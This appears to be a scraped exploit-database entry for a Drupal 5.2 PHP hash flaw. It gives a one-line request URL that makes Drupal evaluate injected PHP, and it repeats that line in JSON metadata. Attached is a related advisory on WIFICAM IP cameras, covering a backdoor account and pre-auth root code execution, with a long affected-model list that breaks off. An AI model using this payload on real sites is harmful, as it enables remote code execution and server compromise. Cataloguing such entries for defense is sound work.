Search...

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

2007-10-10T00:00:00

ID 1337DAY-ID-2213
Type zdt
Reporter ShAnKaR
Modified 2007-10-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Drupal &lt;= 5.2 PHP Zend Hash Vulnerability Exploitation Vector
=============================================================



Drupal &lt;= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/&lt;?phpinfo();



#  0day.today [2018-03-02]  #

JSON Vulners Source

Initial Source

{"published": "2007-10-10T00:00:00", "id": "1337DAY-ID-2213", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:02:31", "bulletin": {"published": "2007-10-10T00:00:00", "id": "1337DAY-ID-2213", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.4, "modified": "2016-04-20T01:02:31"}}, "hash": "fa94adbdfb4307aca3b3878ade7fc875a234d7fcb0ce1d30e33deda1835f9340", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T01:02:31", "edition": 1, "title": "Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector", "href": "http://0day.today/exploit/description/2213", "modified": "2007-10-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/2213", "references": [], "reporter": "ShAnKaR", "sourceData": "=============================================================\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n=============================================================\r\n\r\n\r\n\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n\r\nExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "fc982dfb126e26994793db5b7fef1f18", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a43939200d279809aef6a6dedf6699a9", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "modified"}, {"hash": "d21e6f64a339b954887a62ddc0e55571", "key": "reporter"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "2a9b9a19feaa00606edb8149ae42e6f3", "key": "title"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "00812ac56765e844fd2aaf3d888f1970", "key": "sourceHref"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "0d8fd1fdb437a5e5d419a2f55bcca5b93d70d2218d1d032c26b11a1185db1dd4", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-03-03T01:41:53"}, "dependencies": {"references": [{"type": "seebug", "idList": ["SSV:92748"]}, {"type": "zdt", "idList": ["1337DAY-ID-26008", "1337DAY-ID-25907", "1337DAY-ID-25896", "1337DAY-ID-25861", "1337DAY-ID-6843"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14657", "SECURITYVULNS:VULN:14658", "SECURITYVULNS:VULN:13764", "SECURITYVULNS:DOC:27160", "SECURITYVULNS:DOC:16228", "SECURITYVULNS:DOC:9241", "SECURITYVULNS:VULN:2213", "SECURITYVULNS:VULN:1591", "SECURITYVULNS:DOC:801"]}], "modified": "2018-03-03T01:41:53"}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-03-03T01:41:53", "edition": 2, "title": "Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector", "href": "https://0day.today/exploit/description/2213", "modified": "2007-10-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/2213", "references": [], "reporter": "ShAnKaR", "sourceData": "=============================================================\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n=============================================================\r\n\r\n\r\n\r\nDrupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector\r\n\r\nExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "a76788d69fc2e9fa8117a5af73b3db4d", "key": "href"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "modified"}, {"hash": "1548195e88b21c6135a4e418f4e54c79", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d21e6f64a339b954887a62ddc0e55571", "key": "reporter"}, {"hash": "1e264ae79f3e8b348c22cfbf4704e34a", "key": "sourceData"}, {"hash": "2c6210d7d642f9042cfa7c38d9e5f7ee", "key": "sourceHref"}, {"hash": "2a9b9a19feaa00606edb8149ae42e6f3", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"seebug": [{"lastseen": "2017-11-19T12:01:14", "bulletinFamily": "exploit", "description": "## Product Description\r\n\r\nThe Wireless IP Camera (P2P) WIFICAM is a Chinese web camera which allows to stream remotely.\r\n\r\n![](https://images.seebug.org/content/images/2017/03/2017-icam.jpg)\r\n\r\n## Vulnerabilities Summary\r\n\r\nThe Wireless IP Camera (P2) WIFICAM is a camera overall badly designed with a lot of vulnerabilities. This camera is very similar to a lot of other Chinese cameras.\r\n\r\nIt seems that a generic camera is being sold by a Chinese company in bulk (OEM) and the buyer companies resell them with custom software development and specific branding. Wireless IP Camera (P2) WIFICAM is one of the branded cameras.\r\n\r\nSo, cameras are sold under different names, brands and functions. The HTTP interface is different for each vendor but shares the same vulnerabilities.\r\n\r\nBecause of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE), **which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability**.\r\n\r\nThe summary of the vulnerabilities is:\r\n\r\n1. [CVE-2017-8224 - Backdoor account](#backdoor-account)\r\n2. [CVE-2017-8222 - RSA key and certificates](#rsa-lulz)\r\n3. [CVE-2017-8225 - Pre-Auth Info Leak (credentials) within the custom http server](#pre-auth-info-leak-goahead)\r\n4. [Authenticated RCE as root](#root-rce)\r\n5. [Pre-Auth RCE as root](#pre-auth-root-rce)\r\n6. [CVE-2017-8223 - Misc - Streaming without authentication](#open-streaming)\r\n7. [CVE-2017-8221 - Misc - \"Cloud\" (Aka Botnet)](#cloud)\r\n\r\n**The vulnerabilities in the Cloud management affect a lot of P2P or \"Cloud\" cameras.**\r\n\r\n**My tests have shown that the InfoLeak affecting the GoAhead server running on the camera affects at least 1250+ camera models. It can be used to execute the RCE as root. Thus, these cameras are likely affected by a pre-auth RCE as root:**\r\n\r\n```\r\n3G+IPCam Other\r\n3SVISION Other\r\n3com CASA\r\n3com Other\r\n3xLogic Other\r\n3xLogic Radio\r\n4UCAM Other\r\n4XEM Other\r\n555 Other\r\n7Links 3677\r\n7Links 3677-675\r\n7Links 3720-675\r\n7Links 3720-919\r\n7Links IP-Cam-in\r\n7Links IP-Wi-Fi\r\n7Links IPC-760HD\r\n7Links IPC-770HD\r\n7Links Incam\r\n7Links Other\r\n7Links PX-3615-675\r\n7Links PX-3671-675\r\n7Links PX-3720-675\r\n7Links PX3309\r\n7Links PX3615\r\n7Links ipc-720\r\n7Links px-3675\r\n7Links px-3719-675\r\n7Links px-3720-675\r\nA4Tech Other\r\nABS Other\r\nADT RC8021W\r\nAGUILERA AQUILERA\r\nAJT AJT-019129-BBCEF\r\nALinking ALC\r\nALinking Other\r\nALinking dax\r\nAMC Other\r\nANRAN ip180\r\nAPKLINK Other\r\nAQUILA AV-IPE03\r\nAQUILA AV-IPE04\r\nAVACOM 5060\r\nAVACOM 5980\r\nAVACOM H5060W\r\nAVACOM NEW\r\nAVACOM Other\r\nAVACOM h5060w\r\nAVACOM h5080w\r\nAcromedia IN-010\r\nAcromedia Other\r\nAdvance Other\r\nAdvanced+home lc-1140\r\nAeoss J6358\r\nAetos 400w\r\nAgasio A500W\r\nAgasio A502W\r\nAgasio A512\r\nAgasio A533W\r\nAgasio A602W\r\nAgasio A603W\r\nAgasio Other\r\nAirLink Other\r\nAirmobi HSC321\r\nAirsight Other\r\nAirsight X10\r\nAirsight X34A\r\nAirsight X36A\r\nAirsight XC39A\r\nAirsight XX34A\r\nAirsight XX36A\r\nAirsight XX40A\r\nAirsight XX60A\r\nAirsight x10\r\nAirsight x10Airsight\r\nAirsight xc36a\r\nAirsight xc49a\r\nAirsight xx39A\r\nAirsight xx40a\r\nAirsight xx49a\r\nAirsight xx51A\r\nAirsight xx51a\r\nAirsight xx52a\r\nAirsight xx59a\r\nAirsight xx60a\r\nAkai AK7400\r\nAkai SP-T03WP\r\nAlecto 150\r\nAlecto Atheros\r\nAlecto DVC-125IP\r\nAlecto DVC-150-IP\r\nAlecto DVC-1601\r\nAlecto DVC-215IP\r\nAlecto DVC-255-IP\r\nAlecto dv150\r\nAlecto dvc-150ip\r\nAlfa 0002HD\r\nAlfa Other\r\nAllnet 2213\r\nAllnet ALL2212\r\nAllnet ALL2213\r\nAmovision Other\r\nAndroid+IP+cam IPwebcam\r\nAnjiel ip-sd-sh13d\r\nApexis AH9063CW\r\nApexis APM-H803-WS\r\nApexis APM-H804-WS\r\nApexis APM-J011\r\nApexis APM-J011-Richard\r\nApexis APM-J011-WS\r\nApexis APM-J012\r\nApexis APM-J012-WS\r\nApexis APM-J0233\r\nApexis APM-J8015-WS\r\nApexis GENERIC\r\nApexis H\r\nApexis HD\r\nApexis J\r\nApexis Other\r\nApexis PIPCAM8\r\nApexis Pyle\r\nApexis XF-IP49\r\nApexis apexis\r\nApexis apm-\r\nApexis dealextreme\r\nAquila+Vizion Other\r\nArea51 Other\r\nArmorView Other\r\nAsagio A622W\r\nAsagio Other\r\nAsgari 720U\r\nAsgari Other\r\nAsgari PTG2\r\nAsgari UIR-G2\r\nAtheros ar9285\r\nAvantGarde SUMPPLE\r\nAxis 1054\r\nAxis 241S\r\nB-Qtech Other\r\nB-Series B-1\r\nBRAUN HD-560\r\nBRAUN HD505\r\nBeaulieu Other\r\nBionics Other\r\nBionics ROBOCAM\r\nBionics Robocam\r\nBionics T6892WP\r\nBionics t6892wp\r\nBlack+Label B2601\r\nBravolink Other\r\nBreno Other\r\nCDR+king APM-J011-WS\r\nCDR+king Other\r\nCDR+king SEC-015-C\r\nCDR+king SEC-016-NE\r\nCDR+king SEC-028-NE\r\nCDR+king SEC-029-NE\r\nCDR+king SEC-039-NE\r\nCDR+king sec-016-ne\r\nCDXX Other\r\nCDXXcamera Any\r\nCP+PLUS CP-EPK-HC10L1\r\nCPTCAM Other\r\nCamscam JWEV-372869-BCBAB\r\nCasa Other\r\nCengiz Other\r\nChinavasion Gunnie\r\nChinavasion H30\r\nChinavasion IP611W\r\nChinavasion Other\r\nChinavasion ip609aw\r\nChinavasion ip611w\r\nCloud MV1\r\nCloud Other\r\nCnM IP103\r\nCnM Other\r\nCnM sec-ip-cam\r\nCompro NC150/420/500\r\nComtac CS2\r\nComtac CS9267\r\nConceptronic CIPCAM720PTIWL\r\nConceptronic cipcamptiwl\r\nCybernova Other\r\nCybernova WIP604\r\nCybernova WIP604MW\r\nD-Link DCS-910\r\nD-Link DCS-930L\r\nD-Link L-series\r\nD-Link Other\r\nDB+Power 003arfu\r\nDB+Power DBPOWER\r\nDB+Power ERIK\r\nDB+Power HC-WV06\r\nDB+Power HD011P\r\nDB+Power HD012P\r\nDB+Power HD015P\r\nDB+Power L-615W\r\nDB+Power LA040\r\nDB+Power Other\r\nDB+Power Other2\r\nDB+Power VA-033K\r\nDB+Power VA0038K\r\nDB+Power VA003K+\r\nDB+Power VA0044_M\r\nDB+Power VA033K\r\nDB+Power VA033K+\r\nDB+Power VA035K\r\nDB+Power VA036K\r\nDB+Power VA038\r\nDB+Power VA038k\r\nDB+Power VA039K\r\nDB+Power VA039K-Test\r\nDB+Power VA040\r\nDB+Power VA390k\r\nDB+Power b\r\nDB+Power b-series\r\nDB+Power extcams\r\nDB+Power eye\r\nDB+Power kiskFirstCam\r\nDB+Power va033k\r\nDB+Power va039k\r\nDB+Power wifi\r\nDBB IP607W\r\nDEVICECLIENTQ CNB\r\nDKSEG Other\r\nDNT CamDoo\r\nDVR DVR\r\nDVS-IP-CAM Other\r\nDVS-IP-CAM Outdoor/IR\r\nDagro DAGRO-003368-JLWYX\r\nDagro Other\r\nDericam H216W\r\nDericam H502W\r\nDericam M01W\r\nDericam M2/6/8\r\nDericam M502W\r\nDericam M601W\r\nDericam M801W\r\nDericam Other\r\nDigix Other\r\nDigoo BB-M2\r\nDigoo MM==BB-M2\r\nDigoo bb-m2\r\nDinon 8673\r\nDinon 8675\r\nDinon SEGEV-105\r\nDinon segev-103\r\nDome Other\r\nDrilling+machines Other\r\nE-Lock 1000\r\nENSIDIO IP102W\r\nEOpen Open730\r\nEST ES-IP602IW\r\nEST IP743W\r\nEST Other\r\nEZCam EPK-EP10L1\r\nEZCam EZCam\r\nEZCam Other\r\nEZCam PAN/TILT\r\nEZCam Pan/Tilt\r\nEasyCam EC-101HD\r\nEasyCam EC-101HDSD\r\nEasyCam EC-101SD\r\nEasyCam EC-102\r\nEasyCam Other\r\nEasyN 187\r\nEasyN 1BF\r\nEasyN 720P\r\nEasyN F\r\nEasyN F-136\r\nEasyN F-M136\r\nEasyN F-M166\r\nEasyN F-M181\r\nEasyN F-M1b1\r\nEasyN F-SERIES\r\nEasyN F133\r\nEasyN F2-611B\r\nEasyN F3\r\nEasyN F3-166\r\nEasyN F3-176M\r\nEasyN F3-M166\r\nEasyN F3-SERIES\r\nEasyN F3-Series\r\nEasyN F3-m187\r\nEasyN F3M187\r\nEasyN FS-613A-M136\r\nEasyN FS-613B\r\nEasyN FS-613B-M166\r\nEasyN FS-613B-MJPEG\r\nEasyN FS613\r\nEasyN F_M10R\r\nEasyN H3-V10R\r\nEasyN H6-M137h\r\nEasyN M091\r\nEasyN Other\r\nEasyN est-007660-611b\r\nEasyN est-007660333\r\nEasyN f\r\nEasyN f-Series\r\nEasyN f138\r\nEasyN f_series\r\nEasyN fseries\r\nEasyN kitch\r\nEasyN s\r\nEasySE F/B/N/I\r\nEasySE H3\r\nEasySE H3e\r\nEasySE Other\r\nEbode IPV38W\r\nEbode IPV58\r\nEbode Other\r\nEgo Other\r\nElro 901\r\nElro 903\r\nElro 903IP\r\nElro C7031P\r\nElro C703IP2\r\nElro C704-IP\r\nElro C704IP\r\nElro C704IP.2\r\nElro C704ip\r\nElro C803IP\r\nElro C903IP\r\nElro C903IP.2\r\nElro C904IP\r\nElro C904IP.2\r\nElro IP901\r\nElro Other\r\nEminent 6564\r\nEminent EM6220\r\nEminent EM6564\r\nEminent em6220\r\nEsky C5900\r\nEsky L\r\nEsky Live\r\nEsky c5900\r\nEura-Tech IC-03C3\r\nEyeCam ICAM-608\r\nEyeCam IP65IW\r\nEyeCam Other\r\nEyeCam STORAGEOPTIONS\r\nEyeIPCam IP901W\r\nEyeSight ES-IP607W\r\nEyeSight ES-IP811W\r\nEyeSight ES-IP909IW\r\nEyeSight ES-IP935FW\r\nEyeSight ES-IP935IW\r\nEyeSight IP910IW\r\nEyeSight IP915IW\r\nEyeSight Other\r\nEyeSight ip609IW\r\nEyeSight ip909iw\r\nEyeSight ip915iw\r\nEyeSight mjpeg\r\nEyeSpy247 Other\r\nF-Series FSERIES\r\nF-Series Ip\r\nF-Series Other\r\nF-Series ip\r\nFirst+Concept Other\r\nFocuscam F19821W\r\nFoscam FI18904w\r\nFoscam FI18905E\r\nFoscam FI18905W\r\nFoscam FI18906w\r\nFoscam FI1890W\r\nFoscam FI18910E\r\nFoscam FI18910W\r\nFoscam FI18910w\r\nFoscam FI18916W\r\nFoscam FI18918W\r\nFoscam FI18919W\r\nFoscam FI19810W\r\nFoscam FI8094W\r\nFoscam FI81904W\r\nFoscam FI8601W\r\nFoscam FI8602W\r\nFoscam FI8606W\r\nFoscam FI8610w\r\nFoscam FI8903W\r\nFoscam FI8903W_Elita\r\nFoscam FI8904\r\nFoscam FI8904W\r\nFoscam FI8905E\r\nFoscam FI8905W\r\nFoscam FI8905w\r\nFoscam FI8906w\r\nFoscam FI8907W\r\nFoscam FI8908W\r\nFoscam FI8909W\r\nFoscam FI890W\r\nFoscam FI8910\r\nFoscam FI8910E\r\nFoscam FI8910W\r\nFoscam FI8910W_DW\r\nFoscam FI8910w\r\nFoscam FI8916W\r\nFoscam FI8918\r\nFoscam FI89180w\r\nFoscam FI8918E\r\nFoscam FI8918W\r\nFoscam FI8918w\r\nFoscam FI8919W\r\nFoscam FI9804W\r\nFoscam FI9805E\r\nFoscam FI9810\r\nFoscam FI9810W\r\nFoscam FI9818\r\nFoscam FI9820w\r\nFoscam FI9821W\r\nFoscam FI9821w\r\nFoscam FL8910\r\nFoscam FS18908W\r\nFoscam FS8910\r\nFoscam Fi8910\r\nFoscam Other\r\nFoscam fI8989w\r\nFoscam fi1890w\r\nFoscam fl8910w\r\nFoxCam PTZ2084-L\r\nGIGA gb\r\nGT+ROAD HS-006344-SPSLM\r\nGeneral Other\r\nGeneric All-in-one\r\nGeneric Billy\r\nGeneric DomeA-Outdoor\r\nGeneric IP\r\nGeneric Other\r\nGi-star+srl IP6031W\r\nGigaeye GB\r\nGoAhead EC-101SD\r\nGoAhead GoAheadWebs\r\nGoAhead IPCAM1\r\nGoAhead IPCAM2\r\nGoAhead Other\r\nGoAhead thedon\r\nGoCam Other\r\nGoclever EYE\r\nGoclever EYE2\r\nGotake GTK-TH01B\r\nH+264+network+DVR 720p\r\nH+264+network+DVR Other\r\nH.264 Other\r\nH6837WI Other\r\nHD+IPC Other\r\nHD+IPC SV3C\r\nHDIPCAM Other\r\nHeden CAMH04IPWE\r\nHeden CAMHED02IPW\r\nHeden CAMHED04IP\r\nHeden CAMHED04IPWN\r\nHeden CAMHEDIPWP\r\nHeden Other\r\nHeden VisionCam\r\nHeden visionCam\r\nHiSilicon Other\r\nHikvision DS-2CD2132\r\nHistream RTSP\r\nHooToo F-SERIES\r\nHooToo HOOTOO\r\nHooToo HT-IP006\r\nHooToo HT-IP006N\r\nHooToo HT-IP009HDP\r\nHooToo HT-IP206\r\nHooToo HT-IP207F\r\nHooToo HT-IP210HDP\r\nHooToo HT-IP210P\r\nHooToo HT-IP212\r\nHooToo IP009HDP\r\nHooToo Other\r\nHooToo apm-h803-mpc\r\nHsmartlink Other\r\nHungtek WIFI\r\nICAMView Other\r\nICam I908W\r\nICam IP-1\r\nICam Other\r\nICam Other2\r\nICam dome\r\nINISOFT-CAM Stan\r\nINSTAR 4010\r\nINVID Other\r\nIO+Data Other\r\nIP66 Other\r\nIPC IPC02\r\nIPC Other\r\nIPC S5030-TF\r\nIPC S5030-m\r\nIPC SRICAM\r\nIPCC 3XPTZ\r\nIPCC 7210W\r\nIPCC IPCC-7210W\r\nIPCC x01\r\nIPTeles Other\r\nIPUX ip-100\r\nISIT Other\r\nIZOtech Other\r\nIZTOUCH 0009\r\nIZTOUCH A001\r\nIZTOUCH IZ-009\r\nIZTOUCH LTH-A8645-c15\r\nIZTOUCH Other\r\nIZTOUCH Other1\r\nIZTOUCH ap001\r\nIeGeek Other\r\nIeGeek ukn\r\nInkovideo V-104\r\nIprobot3 Other\r\nJRECam JM3866W\r\nJWcam JWEV\r\nJWcam Other\r\nJaycar 3834\r\nJaycar 720P\r\nJaycar Other\r\nJaycar QC-3831\r\nJaycar QC-3832\r\nJaycar QC-3834\r\nJaycar QC-3836\r\nJaycar QC-3839\r\nJaytech IP6021W\r\nJhempCAM Back\r\nJhempCAM Other\r\nKaiKong 1601\r\nKaiKong 1602w\r\nKaiKong Other\r\nKaiKong SIP\r\nKaiKong SIP1602\r\nKaiKong SIP1602W\r\nKaiKong sip\r\nKaiKong sip1602w\r\nKenton gjc02\r\nKinson C720PWIP\r\nKlok Other\r\nKnewmart KW01B\r\nKnewmart KW02B\r\nKogan KAIPC01BLKA\r\nKogan KAIPCO1BLKA\r\nKogan Other\r\nKogan encoder\r\nKogan kaipc01blkb\r\nKompernass IUK\r\nKoolertron Other\r\nKoolertron PnP\r\nKoolertron SP-SHEX21-SL\r\nLC+security Other\r\nLW lw-h264tf\r\nLYD H1385H\r\nLager Other\r\nLeadtek C351\r\nLevelOne 1010/2010\r\nLibor Other\r\nLifeTech MyLifeTech\r\nLifeTech Other\r\nLifeTech dd\r\nLilly Other\r\nLinq Other\r\nLloyds 1107\r\nLoftek CXS\r\nLoftek Nexus\r\nLoftek Other\r\nLoftek SPECTOR\r\nLoftek Sendinel\r\nLoftek Sentinel\r\nLogiLink WC0030A\r\nLogiLink wc0044\r\nLogitech C920\r\nMCL 610\r\nMJPEG Other\r\nMaginon 100\r\nMaginon 10AC\r\nMaginon 20C\r\nMaginon IP-20c\r\nMaginon IPC\r\nMaginon IPC-1\r\nMaginon IPC-10\r\nMaginon IPC-100\r\nMaginon IPC-100AC\r\nMaginon IPC-10AC\r\nMaginon IPC-2\r\nMaginon IPC-20\r\nMaginon IPC20C\r\nMaginon IPC_1A\r\nMaginon Other\r\nMaginon SUPRA\r\nMaginon Supra\r\nMaginon ipc\r\nMaginon ipc-1a\r\nMaginon ipc100a\r\nMaginon ipx\r\nMaginon w2\r\nMarmitek GM-8126\r\nMaygion IP\r\nMaygion OTHER2\r\nMaygion Other\r\nMaygion V3\r\nMaygion black\r\nMediatech mt4050\r\nMedisana SmartBabyMonitor\r\nMerlin IP\r\nMerlin Other\r\nMerlin vstc\r\nMessoa Other\r\nMingyoushi S6203Y-WR\r\nMomentum 2002\r\nMomentum MO-CAM\r\nNEXCOM S-CAM\r\nNIP NIP-004500-KMTLU\r\nNIP NIP-075007-UPHTF\r\nNIP NIP-11BGPW\r\nNIP NIP-14\r\nNTSE Other\r\nNeewer Other\r\nNeewer V-100\r\nNeo+CoolCam NIP\r\nNeo+CoolCam NIP-02(OAM)\r\nNeo+CoolCam NIP-06\r\nNeo+CoolCam NIP-066777-BWESL\r\nNeo+CoolCam NIP-102428-DFBEF\r\nNeo+CoolCam NIP-H20(OZX)\r\nNeo+CoolCam OBJ-007260-LYLDU\r\nNeo+CoolCam Other\r\nNeo+CoolCam neo\r\nNeo+CoolCam nip-11\r\nNeo+CoolCam nip-20\r\nNess Other\r\nNetView Other\r\nNetcam Dual-HD\r\nNetcam HSL-232245-CWXES\r\nNetcam OUVIS\r\nNetcam Other\r\nNetware Other\r\nNexxt+Solution Xpy\r\nNixzen Other\r\nNorthQ NQ-9006\r\nOffice+One CM-I11123BK\r\nOffice+One IP-900\r\nOffice+One IP-99\r\nOffice+One Other\r\nOffice+One SC-10IP\r\nOffice+One ip-900\r\nOffice+One ip900\r\nOpexia OPCS\r\nOptica+Video FI-8903W\r\nOptica+Video FI-8918W\r\nOptica+Video Other\r\nOtto 4eye\r\nOvermax CamSpot\r\nOvermax Camspot\r\nOwlCam CP-6M201W\r\nP2p wificam\r\nPCS Other\r\nPanasonic BL-C131A\r\nPeopleFu IPC-674\r\nPeopleFu IPCAM1\r\nPeopleFu IPCAM2\r\nPeopleFu IPCAM3\r\nPeopleFu IPCAM5\r\nPixpo 1Z074A2A0301627785\r\nPixpo PIX006428BFYZY\r\nPixpo PIX009491MLJYM\r\nPixpo PIX009495HURFE\r\nPixpo PIX010584DFACE\r\nPlaisio IP\r\nPlanex Other\r\nPlanex PLANEX\r\nPolariod P351S\r\nPolaroid IP-100\r\nPolaroid IP-101W\r\nPolaroid IP-200B\r\nPolaroid IP-201B\r\nPolaroid IP-350\r\nPolaroid IP-351S\r\nPolaroid IP-360S\r\nPolaroid IP-810W\r\nPolaroid IP-810WZ\r\nPolaroid Other\r\nPolaroid POLIP101W\r\nPolaroid POLIP201B\r\nPolaroid POLIP201W\r\nPolaroid POLIP351S\r\nPolaroid POLIP35i5\r\nPowerLead Caue\r\nPowerLead PC012\r\nProveCam IP2521\r\nProvision 717\r\nProvision F-717\r\nProvision F-737\r\nProvision PT-737\r\nProvision WP-711\r\nProvision WP-717P\r\nPyle HD\r\nPyle HD22\r\nPyle HD46\r\nPyle Mine\r\nPyle PIPCAM15\r\nPyle Pipcam12\r\nPyle cam5\r\nPyle pipcam25\r\nPyle pipcam5\r\nQ-nest QN-100S\r\nQ-nest qn-100s\r\nQueback 720p\r\nROCAM NC-400\r\nROCAM NC-500\r\nROCAM NC300\r\nROCAM NC300-1\r\nROHS IP\r\nROHS none\r\nRTX 06R\r\nRTX DVS\r\nRTX IP-06R\r\nRTX IP-26H\r\nRTX Other\r\nRollei safetycam-10hd\r\nSES Other\r\nSKJM Other\r\nSST SST-CNS-BUI18\r\nSVB+International SIP-018262-RYERR\r\nSafeHome 278042\r\nSafeHome 616-W\r\nSafeHome IP601W-hd\r\nSafeHome Other\r\nSafeHome VGA\r\nSafeHome iprobot\r\nSamsung Other\r\nSantec-Video Other\r\nSarotech IPCAM-1000\r\nSarotech ip300\r\nScricam 004\r\nScricam 192.168.1.7\r\nScricam AP-004\r\nScricam AP-009\r\nScricam AP0006\r\nScricam AP006\r\nSecam+CCTV IPCAM\r\nSecam+CCTV Other\r\nSeculink 10709\r\nSeculink Other\r\nSecur+Eye xxc5330\r\nSeisa JK-H616WS\r\nSenao PTZ-01H\r\nSequrecam Other\r\nSequrecam PNP-125\r\nSercomm Other\r\nShenwhen+Neo+Electronic+Co NC-541\r\nShenwhen+Neo+Electronic+Co Other\r\nShenwhen+Neo+Electronic+Co X-5000B\r\nShenzhen 720P\r\nShixin+China IP-129HW\r\nSiepem IPC\r\nSiepem S5001Y-BW\r\nSiepem S6203y\r\nSiepem S6211Y-WR\r\nSimi+IP+Camera+Viewer Other\r\nSineoji Other\r\nSineoji PT-315V\r\nSineoji PT-3215P\r\nSineoji PT-325IP\r\nSinocam Other\r\nSky+Genious Genious\r\nSkytronic IP\r\nSkytronic IP99\r\nSkytronic Other\r\nSkytronic WiFi\r\nSkytronic dome\r\nSmartEye Other\r\nSmartWares C723IP\r\nSmartWares c724ip\r\nSmartWares c923ip\r\nSmartWares c924ip\r\nSolwise SEC-1002W-IR\r\nSpy+Cameras WF-100PCX\r\nSpy+Cameras WF-110V\r\nSricam 0001\r\nSricam 004\r\nSricam A0009\r\nSricam A001\r\nSricam AP-001\r\nSricam AP-003\r\nSricam AP-004\r\nSricam AP-005\r\nSricam AP-006\r\nSricam AP-009\r\nSricam AP-012\r\nSricam AP-CAM\r\nSricam AP0009\r\nSricam AP002\r\nSricam AP995\r\nSricam Cam1\r\nSricam Front\r\nSricam Home\r\nSricam Other\r\nSricam SP005\r\nSricam SP012\r\nSricam SP013\r\nSricam SP015\r\nSricam SRICAM\r\nSricam SRICAM1\r\nSricam aj-c2wa-c118\r\nSricam ap\r\nSricam ap006\r\nSricam ap1\r\nSricam h.264\r\nSricam sp013\r\nSricctv A-0006\r\nSricctv A-009\r\nSricctv AJ-006\r\nSricctv AP-0001\r\nSricctv AP-0005\r\nSricctv AP-0009\r\nSricctv AP-001\r\nSricctv AP-002\r\nSricctv AP-003\r\nSricctv AP-004\r\nSricctv AP-004AF\r\nSricctv AP-005\r\nSricctv AP-006\r\nSricctv AP-007\r\nSricctv AP-008\r\nSricctv AP-009\r\nSricctv AP-011\r\nSricctv AP-014\r\nSricctv H-264\r\nSricctv Other\r\nSricctv P2P-BLACK\r\nSricctv P2P-Black\r\nSricctv SP-007\r\nSricctv SR-001\r\nSricctv SR-004\r\nStar+Vedia 6836\r\nStar+Vedia 7837-WIP\r\nStar+Vedia C-7835WIP\r\nStar+Vedia Other\r\nStar+Vedia T-6836WTP\r\nStar+Vedia T-7833WIP\r\nStar+Vedia T-7837WIP\r\nStar+Vedia T-7838WIP\r\nStarCam C33-X4\r\nStarCam EY4\r\nStarCam F6836W\r\nStarCam Other\r\nStarCam c7837wip\r\nStipelectronics Other\r\nStorage+Options HOMEGUARD\r\nStorage+Options Other\r\nStorage+Options SON-IPC1\r\nSumpple 610\r\nSumpple 610S\r\nSumpple 631\r\nSumpple 960P\r\nSumpple S601\r\nSumpple S610\r\nSumpple S631\r\nSumpple S651\r\nSumpple qd300\r\nSumpple s631\r\nSunVision+US Other\r\nSunbio Other\r\nSuneyes Other\r\nSuneyes SP-T01EWP\r\nSuneyes SP-T01WP\r\nSuneyes SP-TM01EWP\r\nSuneyes SP-TM01WP\r\nSuneyes SP-tm05wp\r\nSunluxy H-264\r\nSunluxy HZCam\r\nSunluxy Other\r\nSunluxy PTZ\r\nSunluxy SL-701\r\nSupra+Space IPC\r\nSupra+Space IPC-1\r\nSupra+Space IPC-100AC\r\nSupra+Space IPC-10AC\r\nSupra+Space Other11\r\nSupra+Space ipc-20c\r\nSure-Eye Other\r\nSurecom LN-400\r\nSwann 005FTCD\r\nSwann 440\r\nSwann 440-IPC\r\nSwann ADS-440\r\nSwann ADS-440-PTZ\r\nSwann ADS-CAMAX1\r\nSwann Other\r\nSwann SWADS-440-IPC\r\nSwann 